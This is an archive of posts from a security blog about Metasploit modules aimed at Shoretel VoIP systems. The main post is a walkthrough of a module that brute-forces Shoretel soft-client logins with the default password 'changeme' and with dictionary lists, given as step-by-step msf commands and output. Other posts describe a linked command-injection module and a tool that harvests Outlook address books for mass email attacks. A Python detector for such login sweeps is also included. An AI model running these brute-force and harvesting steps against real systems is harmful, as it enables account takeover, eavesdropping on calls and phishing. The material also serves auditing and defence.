Archive for the ‘Metasploit’ Category

Hacking Shoretel Converged Conferencing Bridge

April 15, 2011

This Metasploit module was made with the help of Josh (@savant42) for #thotcon.
The methodology of this hack comes entirely from Josh. The Metasploit module was made by both of us.

Thumbs up to Josh for coming up with this.

This post is based on Josh’s (@savant42) talk at #thotcon

In the Shoretel Converged Conferencing Bridge, the Monitoring > System Commands page is vulnerable to command injection.

Another problem is that the backup job runs as root.

This can be found under Configuration > Manual Server Backup.

Based on these 2 vulnerabilities, this Metasploit module was born.

A demo video of the metasploit module can be found here http://www.youtube.com/watch?v=SoIhK1HNn7M

The metasploit module can be found here http://pastebin.com/HszVqSNE

Below is a screenshot of the metasploit module in action

Categories: Exploitation, Metasploit

Exploiting Shoretel Server

March 20, 2011

Hacking Shoretel Voip Server

A demo has been uploaded to youtube http://www.youtube.com/watch?v=owkTf8HEBP8

The meterpreter script can be used to audit the user accounts on the Shoretel server. It is written for Shoreware Director Build 14.X.

There are 2 ways of accessing Shoretel voice services: one via the IP phone and another via the soft client (Shoretel Call Manager client).
The default password for Shoretel Call Manager is 'changeme', and if a person has never logged in to the Shoretel Call Manager client before, he/she will not be able to change the password.
What are the implications if you have never changed the password for your soft client login?
It means that an intruder will be able to log in to your extension using the default password 'changeme' and:

1. Access Call Logs
2. Make Calls
3. Access Your Voice Mails
4. Eavesdrop on an Extension via Intercom?
5. Impersonate another user and send malicious links to other users via the IM feature.

Mitigation Methods

Up to now, I do not know of any options in Shoreware Director to change the default call manager password other than manually editing each account and changing the password.
Enabling AD authentication might be another viable option.

You can download my meterpreter script from http://code.google.com/p/shoretel-brute/ to audit the accounts on your servers which are using the default password.

Bruteforce a user account using default passwords

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS 192.168.1.6
msf > set USERNAME test1
msf > set TEST_OPTION 1
msf > run

[*] Shoreware Director Web Console - Testing Default Passwords for User Accounts
[*] 192.168.1.6:5440 - Trying username:'user1' password:'changeme'
[-] 192.168.1.6:5440 - Successful login 'user1' : 'changeme'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Bruteforce using password list (Dictionary Attack)

Since the Shoretel system places no restrictions on the complexity of the passwords that users can set for their soft client login, and has no account lockout policy (for non-AD authentication), it is possible to brute-force an account.

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS 192.168.1.6
msf > set TEST_OPTION 2
msf > set USERNAME user1
msf > run

[*] 192.168.1.6:5440 - Trying username:'user1' password:'1234'
[-] 192.168.1.6:5440 - Failed to login as 'user1' using password '1234'
[*] 192.168.1.6:5440 - Trying username:'user1' password:'12345'
[-] 192.168.1.6:5440 - Successful login 'user1' : '12345'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check which user accounts are using default passwords

If you already have access to the target’s computer, you can use the getOAB script I wrote to extract all email addresses from the Outlook Offline Address Book to be used for this test.
Check this blog post for more information http://milo2012.wordpress.com/2011/03/14/new-programmeterpreter-script-getoab-parse-offline-addres-book/

msf > use auxiliary/gather/search_email_collector
msf > set DOMAIN domain.com
msf > set OUTFILE "c:/Program Files/Rapid7/framework/msf3/data/wordlists/shoretel_users.txt"
msf > run

Edit shoretel_users.txt and make sure that there is one username on each line.

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS 192.168.1.6
msf > set BRUTEFORCE_SINGLE false
msf > set TEST_OPTION 1
msf > run

[*] 192.168.1.6:5440 - Trying username:'user1' password:'changeme'
[-] 192.168.1.6:5440 - Invalid Username 'user1'
[*] 192.168.1.6:5440 - Trying username:'user2' password:'changeme'
[-] 192.168.1.6:5440 - Successful login 'user2' : 'changeme'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use Dictionary Attacks Against User Accounts
msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS 192.168.1.6
msf > set BRUTEFORCE_SINGLE false
msf > set TEST_OPTION 2
msf > set PASS_FILE “C:/Program Files/Rapid7/framework/msf3/data/wordlists/dict.txt”
msf > run
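
From the defender's side, both test modes above leave a recognisable trail in login records: one source trying many different usernames, or many failures against one account. The following is an added example, not part of the original post or the module; the event format, thresholds and sample lines are assumptions constructed for illustration, not real Shoretel log output.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real Shoretel logs): time, source, user, result.
SAMPLE = """\
2011-03-20T10:00:01 10.0.0.50 user1 FAIL
2011-03-20T10:00:02 10.0.0.50 user2 OK
2011-03-20T10:00:03 10.0.0.50 user3 FAIL
2011-03-20T10:00:04 10.0.0.50 user4 OK
2011-03-20T10:05:00 10.0.0.77 user1 FAIL
2011-03-20T10:05:02 10.0.0.77 user1 FAIL
2011-03-20T10:05:04 10.0.0.77 user1 FAIL
2011-03-20T10:05:06 10.0.0.77 user1 FAIL
2011-03-20T10:05:08 10.0.0.77 user1 FAIL
2011-03-20T11:00:00 10.0.0.12 user9 FAIL
2011-03-20T11:00:20 10.0.0.12 user9 OK
"""

WINDOW = timedelta(minutes=5)
MAX_FAILS_PER_USER = 5    # repeated failures on one account (assumed threshold)
MAX_USERS_PER_SOURCE = 4  # one source trying many accounts (assumed threshold)

def parse(text):
    """Yield (time, source, user, ok) from well-formed lines; skip the rest."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[3] in ("OK", "FAIL"):
            yield datetime.fromisoformat(parts[0]), parts[1], parts[2], parts[3] == "OK"

def detect(text):
    """Return sorted (kind, source, user) alerts using a sliding time window."""
    by_src = defaultdict(list)
    for ts, src, user, ok in parse(text):
        by_src[src].append((ts, user, ok))
    alerts = set()
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end, (ts, _, _) in enumerate(events):
            while ts - events[start][0] > WINDOW:
                start += 1
            window = events[start:end + 1]
            # Count every attempt, not only failures: a default-password sweep may succeed.
            if len({u for _, u, _ in window}) >= MAX_USERS_PER_SOURCE:
                alerts.add(("user-sweep", src, "*"))
            fails = Counter(u for _, u, ok in window if not ok)
            alerts.update(("dictionary", src, u)
                          for u, n in fails.items() if n >= MAX_FAILS_PER_USER)
    return sorted(alerts)
```

The single mistyped login from 10.0.0.12 raises no alert, while the other two sources are flagged as a dictionary attempt and a user sweep respectively.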

Categories: Exploitation, Metasploit

New Program/Meterpreter Script – GetOAB (Parse Offline Address Book)

March 14, 2011

I just wrote this meterpreter script and program that parse the Outlook OAB file for email addresses, so that the email address list can be used in SET (Social-Engineer Toolkit) for a mass email attack or for VoIP system login bruteforce.

This program is written in C# and has been tested with Office 2010. Please let me know if you face any issues with other versions.

https://code.google.com/p/getoab/

Categories: Metasploit

Meterpreter Script for Prefetch-Tool

October 22, 2009

This is the first meterpreter script I wrote for Metasploit Framework. I have integrated the use of the prefetch-tool via a meterpreter script.

As mentioned in the previous post, the Windows prefetch folder contains information about which programs are frequently used. Based on this information, you can find out how the computer was used by the user and what role the computer has in the network.

This meterpreter script is not integrated into Metasploit. To use it, please follow the steps below.

1. Download the below files

a. PrefetchTool Meterpreter Script
b. Prefetch Tool Executable

2. Copy the prefetchtool.rb file to [<metasploit installation folder>\msf3\scripts\meterpreter] folder

3. Copy prefetch.exe to [<metasploit installation folder>\msf3\data] folder

Check out the demo videos below.

http://securitytube.net/Metasploit-Post-Exploitation-Meterpreter-Script-Prefetchtool-video.aspx

http://www.youtube.com/watch?v=0z1Nuk-w2AU&fmt=22

http://vimeo.com/7204412

If you face any issues or have any cool ideas for new scripts, you can contact me at keith.lee2012[at]gmail.com.   (:

Categories: Metasploit